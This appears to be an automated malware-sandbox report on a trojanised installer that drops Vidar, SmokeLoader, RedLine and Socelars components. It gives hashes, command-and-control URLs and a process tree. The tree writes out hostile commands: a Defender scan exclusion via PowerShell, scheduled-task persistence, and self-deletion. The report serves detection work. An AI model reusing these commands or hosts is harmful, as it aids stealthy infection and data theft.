Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
27s -
max time network
1609s -
platform
windows7_x64 -
resource
win7-jp -
submitted
09-09-2021 21:52
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2712 1276 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 1276 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 1276 rundll32.exe 10 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/748-262-0x0000000004A30000-0x0000000004A4F000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
resource yara_rule behavioral1/files/0x0001000000012f0a-110.dat family_socelars behavioral1/files/0x0001000000012f0a-139.dat family_socelars behavioral1/files/0x0001000000012f0a-138.dat family_socelars behavioral1/files/0x0001000000012f0a-105.dat family_socelars behavioral1/files/0x0001000000012f0a-97.dat family_socelars -
resource yara_rule behavioral1/memory/680-341-0x00000000031E0000-0x000000000594D000-memory.dmp redline -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/2000-200-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0002000000012ef7-72.dat aspack_v212_v242 behavioral1/files/0x0002000000012ef7-71.dat aspack_v212_v242 behavioral1/files/0x0001000000012efd-70.dat aspack_v212_v242 behavioral1/files/0x0001000000012efd-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012eff-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012eff-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 1876 setup_installer.exe 1392 setup_install.exe 1008 Thu21a1ef054cac78a.exe 1716 Thu219d5fe8cf316.exe 748 Thu21624565bb917a.exe 1652 Thu2164f292a11ce.exe 1080 Thu21b93295136197.exe 2000 Thu214ce31cede21.exe 1168 Thu21b9847cb6727.exe 1560 Thu2156de5489c19.exe 1616 Thu21568b0ab8.exe 2136 Thu2102ff6cfe07c.exe 2104 Thu214aaca5625.exe 2164 Thu21df5caa1b78de6.exe 2224 Thu21b93295136197.tmp 2244 Thu214aaca5625.tmp -
Loads dropped DLL 53 IoCs
pid Process 1652 setup_x86_x64_install.exe 1876 setup_installer.exe 1876 setup_installer.exe 1876 setup_installer.exe 1876 setup_installer.exe 1876 setup_installer.exe 1876 setup_installer.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1256 cmd.exe 964 cmd.exe 1820 cmd.exe 1820 cmd.exe 316 cmd.exe 316 cmd.exe 816 cmd.exe 1008 setup_2.exe 1008 setup_2.exe 1240 cmd.exe 1240 cmd.exe 1492 cmd.exe 1652 Thu2164f292a11ce.exe 1652 Thu2164f292a11ce.exe 1080 Thu21b93295136197.exe 1080 Thu21b93295136197.exe 1940 cmd.exe 1648 cmd.exe 1000 cmd.exe 2000 Thu214ce31cede21.exe 2000 Thu214ce31cede21.exe 1664 cmd.exe 2104 Thu214aaca5625.exe 2104 Thu214aaca5625.exe 2136 Thu2102ff6cfe07c.exe 2136 Thu2102ff6cfe07c.exe 1124 807218.exe 1124 807218.exe 1080 Thu21b93295136197.exe 2164 Thu21df5caa1b78de6.exe 2164 Thu21df5caa1b78de6.exe 2104 WerFault.exe 2224 Thu21b93295136197.tmp 2224 Thu21b93295136197.tmp 2224 Thu21b93295136197.tmp 2244 Thu214aaca5625.tmp 2244 Thu214aaca5625.tmp 2244 Thu214aaca5625.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3704 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com 18 ipinfo.io 20 ipinfo.io 237 api.2ip.ua 239 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2104 3332 WerFault.exe 133 2800 1056 WerFault.exe 70 3212 964 WerFault.exe 119 3532 3988 WerFault.exe 142 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3412 schtasks.exe 2264 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2672 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 2956 taskkill.exe 2460 taskkill.exe 2724 taskkill.exe 2744 taskkill.exe 3288 taskkill.exe 4052 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2864 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 39 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1652 Thu2164f292a11ce.exe 1652 Thu2164f292a11ce.exe 832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeCreateTokenPrivilege 1008 setup_2.exe Token: SeAssignPrimaryTokenPrivilege 1008 setup_2.exe Token: SeLockMemoryPrivilege 1008 setup_2.exe Token: SeIncreaseQuotaPrivilege 1008 setup_2.exe Token: SeMachineAccountPrivilege 1008 setup_2.exe Token: SeTcbPrivilege 1008 setup_2.exe Token: SeSecurityPrivilege 1008 setup_2.exe Token: SeTakeOwnershipPrivilege 1008 setup_2.exe Token: SeLoadDriverPrivilege 1008 setup_2.exe Token: SeSystemProfilePrivilege 1008 setup_2.exe Token: SeSystemtimePrivilege 1008 setup_2.exe Token: SeProfSingleProcessPrivilege 1008 setup_2.exe Token: SeIncBasePriorityPrivilege 1008 setup_2.exe Token: SeCreatePagefilePrivilege 1008 setup_2.exe Token: SeCreatePermanentPrivilege 1008 setup_2.exe Token: SeBackupPrivilege 1008 setup_2.exe Token: SeRestorePrivilege 1008 setup_2.exe Token: SeShutdownPrivilege 1008 setup_2.exe Token: SeDebugPrivilege 1008 setup_2.exe Token: SeAuditPrivilege 1008 setup_2.exe Token: SeSystemEnvironmentPrivilege 1008 setup_2.exe Token: SeChangeNotifyPrivilege 1008 setup_2.exe Token: SeRemoteShutdownPrivilege 1008 setup_2.exe Token: SeUndockPrivilege 1008 setup_2.exe Token: SeSyncAgentPrivilege 1008 setup_2.exe Token: SeEnableDelegationPrivilege 1008 setup_2.exe Token: SeManageVolumePrivilege 1008 setup_2.exe Token: SeImpersonatePrivilege 1008 setup_2.exe Token: SeCreateGlobalPrivilege 1008 setup_2.exe Token: 31 1008 setup_2.exe Token: 32 1008 setup_2.exe Token: 33 1008 setup_2.exe Token: 34 1008 setup_2.exe Token: 35 1008 setup_2.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 1716 Thu219d5fe8cf316.exe Token: SeDebugPrivilege 1616 Thu21568b0ab8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1652 wrote to memory of 1876 1652 setup_x86_x64_install.exe 26 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1876 wrote to memory of 1392 1876 setup_installer.exe 29 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 564 1392 setup_install.exe 33 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 964 1392 setup_install.exe 34 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1820 1392 setup_install.exe 35 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 1256 1392 setup_install.exe 36 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 1392 wrote to memory of 316 1392 setup_install.exe 37 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 564 wrote to memory of 832 564 cmd.exe 49 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1392 wrote to memory of 816 1392 setup_install.exe 38 PID 1256 wrote to memory of 1008 1256 cmd.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS45789644\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Loads dropped DLL
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\ProgramData\5293635.exe"C:\ProgramData\5293635.exe"6⤵PID:1056
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1056 -s 17087⤵
- Program crash
PID:2800
-
-
-
C:\ProgramData\5117310.exe"C:\ProgramData\5117310.exe"6⤵PID:1944
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2900
-
-
-
C:\ProgramData\807218.exe"C:\ProgramData\807218.exe"6⤵
- Loads dropped DLL
PID:1124
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Loads dropped DLL
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
PID:1008 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2956
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-4O7LH.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4O7LH.tmp\setup_2.tmp" /SL5="$802AC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\is-6J1M8.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-6J1M8.tmp\postback.exe" ss17⤵PID:3332
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss18⤵PID:1088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 8168⤵
- Loads dropped DLL
- Program crash
PID:2104
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Loads dropped DLL
PID:316 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Loads dropped DLL
PID:816 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\is-PVP70.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-PVP70.tmp\Thu21b93295136197.tmp" /SL5="$8003A,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\is-1SH1G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1SH1G.tmp\Setup.exe" /Verysilent7⤵PID:2888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Loads dropped DLL
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
- Loads dropped DLL
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit6⤵PID:3008
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu214ce31cede21.exe /f7⤵
- Kills process with taskkill
PID:2724
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:2672
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵
- Loads dropped DLL
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵
- Executes dropped EXE
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\tmpAC94_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpAC94_tmp.exe"6⤵PID:2780
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵
- Loads dropped DLL
PID:1648 -
C:\Windows\SysWOW64\cmd.execmd8⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u12⤵PID:3484
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:2864
-
-
-
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:2652
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu21df5caa1b78de6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21df5caa1b78de6.exe" & exit6⤵PID:2672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu21df5caa1b78de6.exe" /f7⤵
- Kills process with taskkill
PID:2460
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵
- Loads dropped DLL
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\is-JDHTE.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-JDHTE.tmp\Thu214aaca5625.tmp" /SL5="$60032,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu214aaca5625.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\is-1SH1F.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-1SH1F.tmp\46807GHF____.exe" /S /UID=burnerch27⤵PID:2924
-
C:\Program Files\Windows Mail\ITXNIRNGVR\ultramediaburner.exe"C:\Program Files\Windows Mail\ITXNIRNGVR\ultramediaburner.exe" /VERYSILENT8⤵PID:2984
-
C:\Users\Admin\AppData\Local\Temp\is-9LRP9.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-9LRP9.tmp\ultramediaburner.tmp" /SL5="$60300,281924,62464,C:\Program Files\Windows Mail\ITXNIRNGVR\ultramediaburner.exe" /VERYSILENT9⤵PID:2468
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:3324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1d-19d33-380-91599-b00c8f5ce8170\Lenaenajaxa.exe"C:\Users\Admin\AppData\Local\Temp\1d-19d33-380-91599-b00c8f5ce8170\Lenaenajaxa.exe"8⤵PID:1756
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3932
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3932 CREDAT:275457 /prefetch:210⤵PID:2456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-044d2-9c2-225b2-9805eef3c3b95\Nutanugoca.exe"C:\Users\Admin\AppData\Local\Temp\fa-044d2-9c2-225b2-9805eef3c3b95\Nutanugoca.exe"8⤵PID:2528
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\subb5qsx.vsi\GcleanerEU.exe /eufive & exit9⤵PID:4020
-
C:\Users\Admin\AppData\Local\Temp\subb5qsx.vsi\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\subb5qsx.vsi\GcleanerEU.exe /eufive10⤵PID:2136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\subb5qsx.vsi\GcleanerEU.exe" & exit11⤵PID:2936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:3288
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bjye4mls.bek\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\bjye4mls.bek\installer.exeC:\Users\Admin\AppData\Local\Temp\bjye4mls.bek\installer.exe /qn CAMPAIGN="654"10⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\heyt1hgd.iws\anyname.exe & exit9⤵PID:3256
-
C:\Users\Admin\AppData\Local\Temp\heyt1hgd.iws\anyname.exeC:\Users\Admin\AppData\Local\Temp\heyt1hgd.iws\anyname.exe10⤵PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2jncxk0.02c\gcleaner.exe /mixfive & exit9⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\e2jncxk0.02c\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\e2jncxk0.02c\gcleaner.exe /mixfive10⤵PID:2404
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\e2jncxk0.02c\gcleaner.exe" & exit11⤵PID:2156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:4052
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvujnrm3.jdb\autosubplayer.exe /S & exit9⤵PID:3376
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:1980
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3276
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3412
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3516
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3508
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2264
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:3540
-
-
